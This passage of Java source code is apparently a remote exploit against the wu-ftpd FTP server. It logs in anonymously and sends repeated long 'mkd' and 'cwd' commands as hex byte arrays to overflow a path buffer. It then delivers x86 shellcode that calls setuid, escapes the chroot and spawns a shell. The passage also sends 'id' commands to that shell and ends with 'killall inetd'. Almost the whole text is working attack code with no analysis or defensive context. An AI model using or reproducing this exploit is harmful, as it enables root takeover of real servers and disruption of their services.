char[] codez74 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez74);
char[] codez75 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0x90, 0x90, 0x90 };
sockout.print(codez75);
char[] codez76 = { 0x04, 0xcd, 0x0f, 0x40 };
sockout.print(codez76);
char[] codez77 = { 0x0a };
sockout.print(codez77);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez78 = {  };
sockout.print(codez78);
char[] codez79 = { 0x69, 0x64, 0x0a };
sockout.print(codez79);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez80 = {  };
sockout.print(codez80);
char[] codez81 = { 0x69, 0x64, 0x0a };
sockout.print(codez81);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez82 = {  };
sockout.print(codez82);
char[] codez83 = { 0x69, 0x64, 0x0a };
sockout.print(codez83);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez84 = {  };
sockout.print(codez84);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class wuftpd
{
public wuftpd()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 21;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
shit = sockread.readLine();
System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x75, 0x73, 0x65, 0x72, 0x20, 0x61, 0x6e, 0x6f, 0x6e, 0x79, 0x6d, 0x6f, 0x75, 0x73, 0x0a, 0x70 };
sockout.print(codez1);
char[] codez2 = { 0x61, 0x73, 0x73, 0x20, 0x70, 0x6f, 0x6f, 0x6e, 0x40, 0x6e, 0x69, 0x2e, 0x63, 0x6f, 0x6d, 0x0a };
sockout.print(codez2);
char[] codez3 = { 0x63, 0x77, 0x64, 0x20, 0x2f, 0x69, 0x6e, 0x63, 0x6f, 0x6d, 0x69, 0x6e, 0x67, 0x0a, 0x6d, 0x6b };
sockout.print(codez3);
char[] codez4 = { 0x64, 0x20, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez4);
char[] codez5 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez5);
char[] codez6 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez6);
char[] codez7 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez7);
char[] codez8 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez8);
char[] codez9 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez9);
char[] codez10 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez10);
char[] codez11 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez11);
char[] codez12 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez12);
char[] codez13 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez13);
char[] codez14 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez14);
char[] codez15 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x63, 0x77, 0x64 };
sockout.print(codez15);
char[] codez16 = { 0x20, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez16);
char[] codez17 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez17);
char[] codez18 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez18);
char[] codez19 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez19);
char[] codez20 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez20);
char[] codez21 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez21);
char[] codez22 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez22);
char[] codez23 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez23);
char[] codez24 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez24);
char[] codez25 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez25);
char[] codez26 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez26);
char[] codez27 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x6d, 0x6b, 0x64, 0x20 };
sockout.print(codez27);
char[] codez28 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez28);
char[] codez29 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez29);
char[] codez30 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez30);
char[] codez31 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez31);
char[] codez32 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez32);
char[] codez33 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez33);
char[] codez34 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez34);
char[] codez35 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez35);
char[] codez36 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez36);
char[] codez37 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez37);
char[] codez38 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez38);
char[] codez39 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez39);
char[] codez40 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez40);
char[] codez41 = { 0x78, 0x78, 0x0a, 0x63, 0x77, 0x64, 0x20, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez41);
char[] codez42 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez42);
char[] codez43 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez43);
char[] codez44 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez44);
char[] codez45 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez45);
char[] codez46 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez46);
char[] codez47 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez47);
char[] codez48 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez48);
char[] codez49 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez49);
char[] codez50 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez50);
char[] codez51 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez51);
char[] codez52 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez52);
char[] codez53 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez53);
char[] codez54 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x6d, 0x6b, 0x64, 0x20, 0x78, 0x78 };
sockout.print(codez54);
char[] codez55 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez55);
char[] codez56 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez56);
char[] codez57 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez57);
char[] codez58 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez58);
char[] codez59 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez59);
char[] codez60 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez60);
char[] codez61 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez61);
char[] codez62 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez62);
char[] codez63 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez63);
char[] codez64 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez64);
char[] codez65 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez65);
char[] codez66 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez66);
char[] codez67 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez67);
char[] codez68 = { 0x0a, 0x63, 0x77, 0x64, 0x20, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez68);
char[] codez69 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez69);
char[] codez70 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez70);
char[] codez71 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez71);
char[] codez72 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez72);
char[] codez73 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez73);
char[] codez74 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez74);
char[] codez75 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez75);
char[] codez76 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez76);
char[] codez77 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez77);
char[] codez78 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez78);
char[] codez79 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez79);
char[] codez80 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez80);
char[] codez81 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x6d, 0x6b, 0x64, 0x20, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez81);
char[] codez82 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez82);
char[] codez83 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez83);
char[] codez84 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez84);
char[] codez85 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez85);
char[] codez86 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez86);
char[] codez87 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez87);
char[] codez88 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez88);
char[] codez89 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez89);
char[] codez90 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez90);
char[] codez91 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez91);
char[] codez92 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x63, 0x77, 0x64, 0x20, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez92);
char[] codez93 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez93);
char[] codez94 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez94);
char[] codez95 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez95);
char[] codez96 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez96);
char[] codez97 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez97);
char[] codez98 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez98);
char[] codez99 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez99);
char[] codez100 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez100);
char[] codez101 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez101);
char[] codez102 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez102);
char[] codez103 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x0a, 0x6d, 0x6b, 0x64, 0x20, 0x83, 0xec, 0x04, 0x5e, 0x83, 0xc6 };
sockout.print(codez103);
char[] codez104 = { 0x70, 0x83, 0xc6, 0x20, 0x8d, 0x5e, 0x0c, 0x31, 0xc9, 0xb1, 0x30, 0x80, 0x2b, 0x32, 0x43, 0x49 };
sockout.print(codez104);
char[] codez105 = { 0x75, 0xf9, 0x31, 0xc0, 0x89, 0xc3, 0xb0, 0x17, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xc3, 0xb0, 0x2e };
sockout.print(codez105);
char[] codez106 = { 0xcd, 0x80, 0x31, 0xc0, 0x31, 0xc9, 0x8d, 0x5e, 0x0f, 0xb0, 0x05, 0xcd, 0x80, 0x89, 0x06, 0x31 };
sockout.print(codez106);
char[] codez107 = { 0xc0, 0x8d, 0x5e, 0x11, 0x8b, 0x4e, 0x1f, 0xb0, 0x27, 0xcd, 0x80, 0x31, 0xc0, 0x8d, 0x5e, 0x11 };
sockout.print(codez107);
char[] codez108 = { 0xb0, 0x3d, 0xcd, 0x80, 0x31, 0xc0, 0x8b, 0x1e, 0xb0, 0x85, 0xcd, 0x80, 0x31, 0xc9, 0xb1, 0xfe };
sockout.print(codez108);
char[] codez109 = { 0x31, 0xc0, 0x8d, 0x5e, 0x0c, 0xb0, 0x0c, 0xcd, 0x80, 0x49, 0x75, 0xf4, 0x31, 0xc0, 0x8d, 0x5e };
sockout.print(codez109);
char[] codez110 = { 0x0f, 0xb0, 0x3d, 0xcd, 0x80, 0x31, 0xc0, 0x8d, 0x5e, 0x17, 0x8d, 0x4e, 0x04, 0x8d, 0x56, 0x08 };
sockout.print(codez110);
char[] codez111 = { 0x89, 0x19, 0x89, 0x02, 0xb0, 0x0b, 0xcd, 0x80, 0x31, 0xdb, 0x89, 0xd8, 0x40, 0xcd, 0x80, 0x90 };
sockout.print(codez111);
char[] codez112 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x76, 0x61, 0x72, 0x30, 0x63, 0x6d };
sockout.print(codez112);
char[] codez113 = { 0x64, 0x30, 0x63, 0x6d, 0x64, 0x31, 0x60, 0x60, 0x32, 0x60, 0x32, 0x9a, 0x93, 0xaa, 0x62, 0xa4 };
sockout.print(codez113);
char[] codez114 = { 0x32, 0x61, 0x94, 0x9b, 0xa0, 0x61, 0xa5, 0x9a, 0x32, 0xe8, 0x33, 0x32, 0x32, 0x32, 0x32, 0x32 };
sockout.print(codez114);
char[] codez115 = { 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez115);
char[] codez116 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez116);
char[] codez117 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez117);
char[] codez118 = { 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78, 0x78 };
sockout.print(codez118);
char[] codez119 = { 0x78, 0x78, 0x78, 0x78, 0x81, 0xac, 0x05, 0x08, 0x0a };
sockout.print(codez119);
char[] codez120 = { 0x6b, 0x69, 0x6c, 0x6c, 0x61, 0x6c, 0x6c, 0x20, 0x69, 0x6e, 0x65, 0x74, 0x64, 0x0a };
sockout.print(codez120);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
